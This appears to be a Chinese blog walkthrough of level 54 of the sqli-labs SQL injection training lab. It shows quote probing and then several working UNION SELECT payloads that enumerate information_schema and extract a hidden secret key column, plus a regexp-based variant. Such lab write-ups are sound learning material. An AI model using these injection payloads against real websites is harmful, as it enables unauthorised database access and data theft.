zoukankan      html  css  js  c++  java

  • sqli-labs(十七)

    第五十四关:

    这关大概意思就是尝试次数不能多于十次,必须十次之类查询处特点的key。

    第一次:输入单引号报错

    第二次:输入双引号不报错

    说明后台是单引号进行的拼凑

    第三步:这里应该是判断列,用order by来判断。

    这里已知是三行(手动滑稽)

    第四步:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where  table_schema="challenges" --+

    第五步:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where  table_name="ewdzu507qq" --+

    第六步:?id=0' union select 1,group_concat(secret_6PNC),group_concat(sessid) from challenges.ewdzu507qq --+

     最后:也可以用正则的方法来查询

    ?id=-1' union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where column_name regexp "^secret_[A-Z]{4}$" limit 0,1  --+
  • 相关阅读:
    数据--第53课
    数据--第52课
    数据--第51课
    标准模板库中的优先队列(priority_queue)
    进程的定义
    进程的基本概念
    循环不变式
    插入排序
    模板声明
    标准模板库中的队列(queue)
  • 原文地址:https://www.cnblogs.com/jinqi520/p/9600686.html
Copyright © 2011-2022 走看看